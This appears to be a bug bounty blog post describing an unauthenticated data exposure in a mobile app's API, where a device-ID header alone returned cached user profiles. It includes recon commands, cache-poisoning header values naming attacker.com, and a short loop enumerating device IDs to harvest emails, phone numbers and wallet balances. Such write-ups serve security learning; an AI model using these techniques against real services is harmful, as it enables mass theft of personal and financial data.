Hey there!😁

None
Image by AI

My phone trusts me — I paid for it.

My parents trust me — occasionally, depending on my recent life decisions.

But this mobile app?

This mobile app trusted my phone more than it ever should have.

That blind trust turned into one of the cleanest high‑impact bugs I've reported in a long time.

It Started Like Every Other Mobile Test

This wasn't a "big brain" moment at first.

It started with coffee ☕, a boring afternoon, and an APK that looked way too confident in itself.

The app was polished. No obvious secrets. SSL pinning enabled. Login flow looked solid. The kind of app that quietly suggests, "You won't find anything here."

Naturally, that's exactly where I stayed.

I bypassed SSL pinning, fired up Burp, logged in normally, and started watching API traffic scroll by. Nothing fancy. Just patience.

And then I noticed something small — the kind of thing scanners don't scream about.

The Assumption That Changed Everything

Almost every request carried the same headers:

X-Device-Id: 7c3f9e2b-xxxx-xxxx
X-Device-Model: Pixel_7
X-OS-Version: 14
X-App-Version: 5.2.1

At first glance, this looks normal. Mobile apps do this all the time.

The problem wasn't the headers.

The problem was how much the backend trusted them.

No signed device token. No server‑side binding. No validation beyond "this looks right."

If the client said, "I'm this device," the server believed it.

That's not device verification. That's faith.

Going Wide Before Going Deep

Before touching authentication, I went into recon mode.

I mapped everything mobile‑related:

  • API subdomains
  • Versioned routes (/v1, /v2, /mobile)
  • Endpoints only called by the app
  • CDN‑fronted paths

Basic commands, nothing exotic:

assetfinder target.com | grep api
subfinder -d target.com -silent | httpx

Then I pulled old and forgotten routes:

waybackurls target.com | grep "/api/"

That's when one endpoint stood out:

https://api.target.com/mobile/cache/profile

Any time you see cache and profile in the same URL, stop and stare.

The Endpoint That Knew Too Much

The request looked like this:

GET /mobile/cache/profile
Authorization: Bearer <token>
X-Device-Id: <device-id>

And the response?

{
  "user_id": "98213",
  "email": "victim@target.com",
  "phone": "+91xxxxxxxx",
  "kyc_status": "VERIFIED",
  "wallet_balance": 18450
}

Clean. Sensitive. Definitely not something you want cached carelessly.

So I did the simplest test possible.

I logged out.

None
Gif

One Header Too Many

I removed the token entirely and sent:

GET /mobile/cache/profile
X-Device-Id: 7c3f9e2b-xxxx-xxxx

The response came back:

200 OK

Same data. Same user.

The backend didn't care about authentication anymore.

It cared about the device.

When Caching Turns a Bug Into a Breach

Things got serious when I checked the response headers:

Cache-Control: public, max-age=600

Public cache. User profile data.

That's when this stopped being a simple auth bug.

This was now cache abuse territory.

Cache Poisoning — The Quiet Kind

The CDN cache key included:

  • URL path
  • X‑Device‑Id

But ignored:

  • Authorization header
  • Actual user session

That meant one thing:

If I could poison the cache once, the damage would persist.

I tested header manipulation:

X-Device-Id: victim-device-id
X-Forwarded-Host: attacker.com

Then:

X-Device-Id: victim-device-id
X-Original-URL: /admin

The cache didn't blink.

It happily stored sensitive user data tied only to a device identifier.

Anyone who knew — or guessed — that ID could retrieve it.

Scaling the Impact

This wasn't limited to one account.

Device IDs followed a predictable UUID pattern. No rate limiting. No anomaly detection.

A simple script was enough:

for id in device_ids:
    request("/mobile/cache/profile", headers={"X-Device-Id": id})

What came back:

  • Emails
  • Phone numbers
  • Wallet balances
  • Internal user IDs

At scale.

No login.

This bug enabled:

  • Unauthenticated access
  • Cross‑user data exposure
  • CDN‑level persistence
  • Financial information leakage

In real terms:

  • Identity exposure
  • Account takeover preparation
  • Regulatory risk

This wasn't theoretical. It was quiet, repeatable, and dangerous.

The Takeaway

Mobile apps love trusting devices.

Attackers love when they do.

If your backend treats client‑supplied headers as truth, you're not doing security — you're hoping for the best.

And hope doesn't scale.

Final Notes for Hunters

  • Don't rush mobile testing
  • Device trust is often fake trust
  • Cached user data is a goldmine
  • The best bugs look boring at first

This wasn't about speed. It wasn't about luck.

It was about paying attention.

And that's usually where the real money hides. 🐞💥

Connect with Me!

  • LinkedIn
  • Instagram: @rev_shinchan
  • Gmail: rev30102001@gmail.com

#EnnamPolVazhlkai😇

#BugBounty, #CyberSecurity, #InfoSec, #Hacking, #WebSecurity, #CTF.